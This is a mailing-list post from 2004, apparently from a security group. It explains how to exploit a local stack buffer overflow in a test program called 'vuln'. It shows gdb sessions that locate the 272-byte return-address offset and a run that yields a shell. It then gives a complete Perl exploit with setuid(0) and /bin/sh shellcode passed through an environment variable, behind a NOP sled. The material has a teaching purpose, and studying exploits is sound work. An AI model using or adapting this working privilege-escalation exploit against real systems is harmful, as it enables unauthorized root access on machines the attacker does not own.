Ok, let,s go. Im gonna describe the method that i use to find addresses
and how to exploit then, i wrote the proper exploit for this vulnerable
program in perl, i hope you understand (i dont code in C)
Lets see some gdb :
(gdb) r `perl -e 'print "A"x268'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/help/vuln `perl -e 'print "A"x268'`
You Entered:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x42015800 in init () from /lib/i686/libc.so.6
(gdb) x/x $eip
0x42015800 : 0x04bb8900
(gdb) r `perl -e 'print "A"x272'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/help/vuln `perl -e 'print "A"x272'`
You Entered:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/x $eip
0x41414141: Cannot access memory at address 0x41414141
You are rigth, with 272 bytes we can overwrite return address (eip)
Now look the exploitation:
[hash_at_etmba12 /tmp/help]$ ./example.pl
Return address: 0xbfffffb5
You Entered:µÿÿ¿µÿÿ¿µÿÿ¿µÿÿ¿µÿÿ¿µÿÿ¿
sh-2.05b$
Now the exploit i wrote:
------------------------------
#!/usr/bin/perl
# env method local stack overflow
# by Carlos Carvalho - length
# <h4sh_at_globo.com length_at_flowsecurity.org>
$shellcode =
#setuid0 by length
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80".
#shellcode
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";
$path = "/tmp/help/vuln";
$return_addr = 0xbffffffa - length($shellcode) - length($path);
$offset = shift or $offset = 0;
$nret = pack('l', ($return_addr + $offset));
for ($i = 0 ; $i < 268 ; $i++) { $buffer .= "\x90" };
$buffer .= $nret x 6;
print("Return address: 0x", sprintf('%lx',($return_addr + $offset)), "\n");
local($ENV{'FUCK'}) = $shellcode;
exec("$path $buffer");
------------------------------
I hope this example help you. Now some information about machine that i
used to write this:
$ rpm -qi gcc
Name : gcc
Version : 3.2
$ uname -a
Linux ***** 2.4.18-14 #1 Wed Sep 4 12:13:11 EDT 2002 i686 athlon i386 GNU/Linux
# _____
# | ___| | _____ __
# | |_ | |/ _ \ \ /\ / /
# | _| | | (_) \ V V /
# |_| |_|\___/ \_/\_/
#
# Security group
length - www.flowsecurity.org
Received on Nov 10 2004
Intro
